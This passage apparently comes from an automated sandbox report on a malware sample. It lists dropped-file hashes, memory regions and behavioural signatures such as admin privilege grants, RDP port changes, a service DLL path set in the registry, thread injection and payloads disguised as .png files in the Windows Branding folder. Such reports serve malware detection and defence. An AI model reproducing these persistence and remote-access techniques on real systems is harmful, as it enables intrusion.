| SHA512 | d79ccd447e15899efbc68e351d2500efc8ad6c106eb76565105e5eec3ace6a02435d6569d23efc65527d00c878eb22f4afabfdca440d9b573548e18fdea72847 |
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sta.xltx
| MD5 | 109dfda879c2954ab2c86c465af694b1 |
| SHA1 | 318bec946966f6640d4a8cc2f615d8ff46e0e598 |
| SHA256 | 74a6499a65d4b1df96a8db88714fb75f6ffe99b84d39c4d492ec840df0f9bf67 |
| SHA512 | afb8077b538ce66fe6c998e10699369f7151ba35e78e08c5cc82d78f48c0662bf729f2a0dd666dc755841a939c1212ddc55132ab4ae441f341dfa01122bfe977 |
\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com
| MD5 | f83ab141e29899ceb5308dabde894a0e |
| SHA1 | 6ea46bb7102125fa5d39b77547dab28ec346e9f9 |
| SHA256 | ce2fb05b7d6e31db76127521aac02d9b3d595058ba13687c4ad6c68088eb8d99 |
| SHA512 | d79ccd447e15899efbc68e351d2500efc8ad6c106eb76565105e5eec3ace6a02435d6569d23efc65527d00c878eb22f4afabfdca440d9b573548e18fdea72847 |
memory/852-80-0x0000000000520000-0x0000000000521000-memory.dmp
memory/1760-81-0x0000000000460000-0x0000000000AAA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com
| MD5 | f83ab141e29899ceb5308dabde894a0e |
| SHA1 | 6ea46bb7102125fa5d39b77547dab28ec346e9f9 |
| SHA256 | ce2fb05b7d6e31db76127521aac02d9b3d595058ba13687c4ad6c68088eb8d99 |
| SHA512 | d79ccd447e15899efbc68e351d2500efc8ad6c106eb76565105e5eec3ace6a02435d6569d23efc65527d00c878eb22f4afabfdca440d9b573548e18fdea72847 |
memory/1760-83-0x0000000000460000-0x0000000000AAA000-memory.dmp
memory/1760-84-0x0000000042A70000-0x0000000042E90000-memory.dmp
memory/1760-87-0x00000000293C4000-0x00000000293C6000-memory.dmp
memory/1760-86-0x00000000293C2000-0x00000000293C4000-memory.dmp
memory/1760-88-0x00000000293C6000-0x00000000293C7000-memory.dmp
memory/1760-89-0x00000000293C7000-0x00000000293C8000-memory.dmp
memory/1308-90-0x0000000000000000-mapping.dmp
memory/1308-92-0x0000000002490000-0x0000000002491000-memory.dmp
memory/1308-93-0x000000001ACF0000-0x000000001ACF1000-memory.dmp
memory/1308-94-0x0000000002670000-0x0000000002671000-memory.dmp
memory/1308-95-0x000000001AC70000-0x000000001AC72000-memory.dmp
memory/1308-96-0x000000001AC74000-0x000000001AC76000-memory.dmp
memory/1308-97-0x0000000002540000-0x0000000002541000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ready.ps1
| MD5 | 3447df88de7128bdc34942334b2fab98 |
| SHA1 | 519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb |
| SHA256 | 9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9 |
| SHA512 | 2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f |
memory/1308-99-0x000000001AB80000-0x000000001AB81000-memory.dmp
memory/1928-100-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\dfxeqvt1\dfxeqvt1.cmdline
| MD5 | dd2bb3fde88bc75c3193cb342534e466 |
| SHA1 | 7314282ed3d10f16da082a1839f481b1bb19bffc |
| SHA256 | 3dd81f8ea04669045058eeb64dcff35761bb75cab1b171942df8266ed2fd3d93 |
| SHA512 | 290ee2c148786b3937acc4e293289eabc9c25317225930d9c2ede65ff9675a357aea48eba27d8faa716127d772328281d1f4d273f2539fd392b001235549c550 |
\??\c:\Users\Admin\AppData\Local\Temp\dfxeqvt1\dfxeqvt1.0.cs
| MD5 | 4864fc038c0b4d61f508d402317c6e9a |
| SHA1 | 72171db3eea76ecff3f7f173b0de0d277b0fede7 |
| SHA256 | 0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84 |
| SHA512 | 9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31 |
memory/1972-103-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\dfxeqvt1\CSC63C13FED99E4412E87E4A9C7B7A5D23.TMP
| MD5 | 8e283c5ec295ba1c7553585110fb74c3 |
| SHA1 | a2cffed1307eaa29949dd9ceaae99ca637d91066 |
| SHA256 | c8ffe8446024227ef33c6aa32cd8808b8918012b76e3bf052045539e350f9a8d |
| SHA512 | e25f3b48158d478485c997866456410ab49f826f9087ac0535bcd05948220c856551a49b9ab0478af3003d3133ed7f93c12e9fd8c05fee4e2b0172de271484ad |
C:\Users\Admin\AppData\Local\Temp\RES8797.tmp
| MD5 | cf700fd33476960f54a3ba40ca5bec24 |
| SHA1 | ba84f8bc323bb3308673ed17d15ba58bc4b14849 |
| SHA256 | 77899b4f370cc46489f0d20a601c8aac0691e74e14274346fdad72d24b81efae |
| SHA512 | 9ff89e60bac1789be7e882c080dc7a935c594ec341ba1ccc2f842e84e020028132c55d35ad40c1bc10fbfcd32cbcf4bd75563e2bc4ec5a4fb4555d63cefc2036 |
memory/1308-107-0x0000000002360000-0x0000000002361000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\dfxeqvt1\dfxeqvt1.dll
| MD5 | 1287ab26ff45b645e83c4dd189987e99 |
| SHA1 | 55b3ddd405ebe6662adfa58b7ccf17ce64436701 |
| SHA256 | 3073ff361b5a99ee1150aeaa36c3d4c64401bcc951a617920b9b9893e8689c7b |
| SHA512 | 5e0978da817818efd2529642ad73da40ee71c313dd17e6f896599e375a2b1f29e63117c81dfbc41e2881e516cc38afff99045bbda593f28b5b53801a4c8a3e3e |
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1
| MD5 | 91f2ffa1c3ed8abba9ce6a3a8f63ae61 |
| SHA1 | 0686c03aedfa4a0a17397da8dbb7e73cea42fa33 |
| SHA256 | 069a95878671a32398ba592ad95049a9bff8b727849465d73c17382eb53869f8 |
| SHA512 | 91473dfbf6b058b9ff70b38b1a7c82046b130c44e349e90b97eb651198b0a64a201ea64b03877e3179b2cb8c729a9fb0a54c408206d8f06c8a71197d3fba93ae |
memory/1308-109-0x000000001C330000-0x000000001C331000-memory.dmp
memory/1308-110-0x000000001C470000-0x000000001C471000-memory.dmp
memory/1308-111-0x00000000028F0000-0x00000000028F1000-memory.dmp
memory/1216-112-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | a1956d9ecd255059b1254562a425a965 |
| SHA1 | 23331d80c5c3fa93130dacd8d660d649b594cac1 |
| SHA256 | a645d8b706a50d92c02105033f04dd79635565dba33f5f2ecb154deb8794043b |
| SHA512 | 96afed228eeb8a264224df43bcaf5cc52d1ade8ea17dda6887f1f4ebdd916ce6456ae0d42122e325855905468e8d31e49d6dbd2419c24084818d51b0071bac6a |
memory/1216-118-0x000000001AAE0000-0x000000001AAE2000-memory.dmp
memory/1216-119-0x000000001AAE4000-0x000000001AAE6000-memory.dmp
memory/1216-120-0x000000001A880000-0x000000001A881000-memory.dmp
memory/1216-122-0x000000001B6A0000-0x000000001B6A1000-memory.dmp
memory/1216-124-0x000000001AA80000-0x000000001AA81000-memory.dmp
memory/1216-125-0x000000001A8A0000-0x000000001A8A1000-memory.dmp
memory/1308-126-0x000000001AC7A000-0x000000001AC99000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
| MD5 | deb6f27d11fadf7d96583cf12d1047e5 |
| SHA1 | 784e3aeaa6b9df4b029221930ad7f39719b7a896 |
| SHA256 | c18df5a3aace18946044f6858cda30db45f4ef2250e6331a62f1e2b29876ad88 |
| SHA512 | 21bf04b9dd4c1b6fc5d062a2f76f3cc6c1aa5c6e68f1ef4245975f64eeca120fa372e52bce34cb00b413bd094136fe2aea80af382767c49387b5dab89e363092 |
memory/1216-131-0x000000001B5D0000-0x000000001B5D1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c3341d5f-f6f7-4a06-93d1-2b1aa0469860
| MD5 | 6f0d509e28be1af95ba237d4f43adab4 |
| SHA1 | c665febe79e435843553bee86a6cea731ce6c5e4 |
| SHA256 | f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e |
| SHA512 | 8dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797 |
memory/1216-144-0x000000001B790000-0x000000001B791000-memory.dmp
memory/1216-145-0x000000001BAA0000-0x000000001BAA1000-memory.dmp
memory/1996-146-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | a1956d9ecd255059b1254562a425a965 |
| SHA1 | 23331d80c5c3fa93130dacd8d660d649b594cac1 |
| SHA256 | a645d8b706a50d92c02105033f04dd79635565dba33f5f2ecb154deb8794043b |
| SHA512 | 96afed228eeb8a264224df43bcaf5cc52d1ade8ea17dda6887f1f4ebdd916ce6456ae0d42122e325855905468e8d31e49d6dbd2419c24084818d51b0071bac6a |
memory/1996-152-0x0000000002610000-0x0000000002611000-memory.dmp
memory/1996-154-0x000000001B550000-0x000000001B551000-memory.dmp
memory/1996-156-0x000000001B850000-0x000000001B851000-memory.dmp
memory/1996-157-0x0000000001EF0000-0x0000000001EF1000-memory.dmp
memory/1996-158-0x0000000002670000-0x0000000002672000-memory.dmp
memory/1996-159-0x0000000002674000-0x0000000002676000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
| MD5 | 9e29baaabead92aa320a659ac6854f0e |
| SHA1 | c6018a138e414c5b37dc56890d06b26eaeeb4e96 |
| SHA256 | 85f30059928a7206ea7842ac6c8220d8ac43b4808baf40c9f5f2589b15ab3b6c |
| SHA512 | e64781defdbdfa4893128ad6fab413b40c92c7f323104506ec98a73055d3f9109eb8694cfc8643175b352e88e103d8408755d7292f360cc2ab8f13570440f4f0 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9fc14ef1-eb37-46d6-a0cc-ff463048cc3d
| MD5 | a70ee38af4bb2b5ed3eeb7cbd1a12fa3 |
| SHA1 | 81dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9 |
| SHA256 | dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d |
| SHA512 | 8c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_257acb85-2b4b-47f6-b6b2-98066b5664c3
| MD5 | 7f79b990cb5ed648f9e583fe35527aa7 |
| SHA1 | 71b177b48c8bd745ef02c2affad79ca222da7c33 |
| SHA256 | 080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683 |
| SHA512 | 20926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ec3a7287-11fb-46e2-ad8f-73615980e4bf
| MD5 | e5b3ba61c3cf07deda462c9b27eb4166 |
| SHA1 | b324dad73048be6e27467315f82b7a5c1438a1f9 |
| SHA256 | b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925 |
| SHA512 | a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f81d8301-df28-4d3a-91b6-5aae89c1be47
| MD5 | d89968acfbd0cd60b51df04860d99896 |
| SHA1 | b3c29916ccb81ce98f95bbf3aa8a73de16298b29 |
| SHA256 | 1020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9 |
| SHA512 | b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f180a3bb-5444-4868-9038-51313509a6f6
| MD5 | 2d5cd190b5db0620cd62e3cd6ba1dcd3 |
| SHA1 | ff4f229f4fbacccdf11d98c04ba756bda80aac7a |
| SHA256 | ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d |
| SHA512 | edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_28c2325e-95a1-4f80-bbe3-b4cd5d9b463c
| MD5 | faa37917b36371249ac9fcf93317bf97 |
| SHA1 | a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4 |
| SHA256 | b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132 |
| SHA512 | 614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198 |
memory/1064-167-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | a1956d9ecd255059b1254562a425a965 |
| SHA1 | 23331d80c5c3fa93130dacd8d660d649b594cac1 |
| SHA256 | a645d8b706a50d92c02105033f04dd79635565dba33f5f2ecb154deb8794043b |
| SHA512 | 96afed228eeb8a264224df43bcaf5cc52d1ade8ea17dda6887f1f4ebdd916ce6456ae0d42122e325855905468e8d31e49d6dbd2419c24084818d51b0071bac6a |
memory/1064-173-0x0000000002840000-0x0000000002842000-memory.dmp
memory/1064-174-0x0000000002844000-0x0000000002846000-memory.dmp
memory/1308-181-0x000000001C500000-0x000000001C501000-memory.dmp
memory/2012-182-0x0000000000000000-mapping.dmp
C:\Windows\system32\rfxvmt.dll
| MD5 | dc39d23e4c0e681fad7a3e1342a2843c |
| SHA1 | 58fd7d50c2dca464a128f5e0435d6f0515e62073 |
| SHA256 | 6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9 |
| SHA512 | 5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7 |
memory/1608-184-0x0000000000000000-mapping.dmp
memory/920-185-0x0000000000000000-mapping.dmp
memory/1080-186-0x0000000000000000-mapping.dmp
memory/948-187-0x0000000000000000-mapping.dmp
memory/792-188-0x0000000000000000-mapping.dmp
memory/1144-189-0x0000000000000000-mapping.dmp
memory/992-190-0x0000000000000000-mapping.dmp
memory/1972-191-0x0000000000000000-mapping.dmp
memory/1964-192-0x0000000000000000-mapping.dmp
memory/1376-193-0x0000000000000000-mapping.dmp
memory/1072-194-0x0000000000000000-mapping.dmp
memory/1504-195-0x0000000000000000-mapping.dmp
memory/1188-196-0x0000000000000000-mapping.dmp
memory/1592-197-0x0000000000000000-mapping.dmp
memory/1688-198-0x0000000000000000-mapping.dmp
memory/1696-199-0x0000000000000000-mapping.dmp
memory/1576-200-0x0000000000000000-mapping.dmp
memory/852-201-0x0000000000000000-mapping.dmp
memory/1212-202-0x0000000000000000-mapping.dmp
memory/816-203-0x0000000000000000-mapping.dmp
\Windows\Branding\mediasrv.png
| MD5 | 7ddf5fb0ee8289cc286b454a7b53a603 |
| SHA1 | 065aeffcc062d442671b3f67df6473bee9367b3a |
| SHA256 | 8f55881188f7be83a94148b548fee913bde5d658ea462dd9e4dc5945e41197e7 |
| SHA512 | 7783144e8b92512d4e9bf23664d56bdab30f3c97a3e7d31d4ca233f7f47bd69983e7f5f9f2469b420146460ae514b9c891a66aad06077f06d1df1cf9b15581a4 |
\Windows\Branding\mediasvc.png
| MD5 | 667d42e1a5ba6c7a929e8e77262a9861 |
| SHA1 | dd73058c4d6b851f3c347410342a0b7a9b2a689a |
| SHA256 | a6a996d5e38ac43969a5151393e87aa85b79d1a5bb4449ca1328c610e8803a1c |
| SHA512 | 7fb5611eba143a32faf3e20637c649ed78535578f7f64750b52586b3fbf738ad07a40f61fe7840204a7ee8d42fb75d7e6213579c7f4df114f3e135e72825bb53 |
memory/2012-206-0x0000000000000000-mapping.dmp
memory/1608-207-0x0000000000000000-mapping.dmp
memory/944-208-0x0000000000000000-mapping.dmp
memory/948-209-0x0000000000000000-mapping.dmp
memory/1728-210-0x0000000000000000-mapping.dmp
memory/1604-211-0x0000000000000000-mapping.dmp
memory/1072-212-0x0000000000000000-mapping.dmp
memory/1956-213-0x0000000000000000-mapping.dmp
memory/1692-214-0x0000000000000000-mapping.dmp
memory/520-215-0x0000000000000000-mapping.dmp
memory/1836-216-0x0000000000000000-mapping.dmp
memory/1928-217-0x0000000000000000-mapping.dmp
memory/1964-218-0x0000000000000000-mapping.dmp
memory/1688-219-0x0000000000000000-mapping.dmp
memory/552-220-0x0000000000000000-mapping.dmp
memory/1692-221-0x0000000000000000-mapping.dmp
memory/1692-225-0x00000000195C0000-0x00000000195C2000-memory.dmp
memory/1692-226-0x00000000195C4000-0x00000000195C6000-memory.dmp
memory/1692-257-0x00000000195CA000-0x00000000195E9000-memory.dmp
memory/1644-258-0x0000000000000000-mapping.dmp
memory/1576-259-0x0000000000000000-mapping.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2021-08-24 05:19
Reported
2021-08-24 05:22
Platform
win10v20210408
Max time kernel
133s
Max time network
165s
Command Line
Signatures
Grants admin privileges
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com | N/A |
Modifies RDP port number used by Windows
Sets DLL path for service in the registry
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3940 set thread context of 1840 | N/A | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com | C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uso.exe.com |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI8AF7.tmp | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI8B67.tmp | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\branding\mediasrv.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\Basebrd | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\mediasrv.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\mediasvc.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI8B18.tmp | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\branding\wupsvc.jpg | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\ShellBrd | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI8A98.tmp | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_zqdv43pd.al1.psm1 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI8B08.tmp | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\branding\mediasvc.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\wupsvc.jpg | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_lprmbcq1.bu2.ps1 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1400 = "3" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\LowIcon = "inetcpl.cpl#005424" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1400 = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Flags = "219" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags = "71" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\LowIcon = "inetcpl.cpl#005423" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200 = "3" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
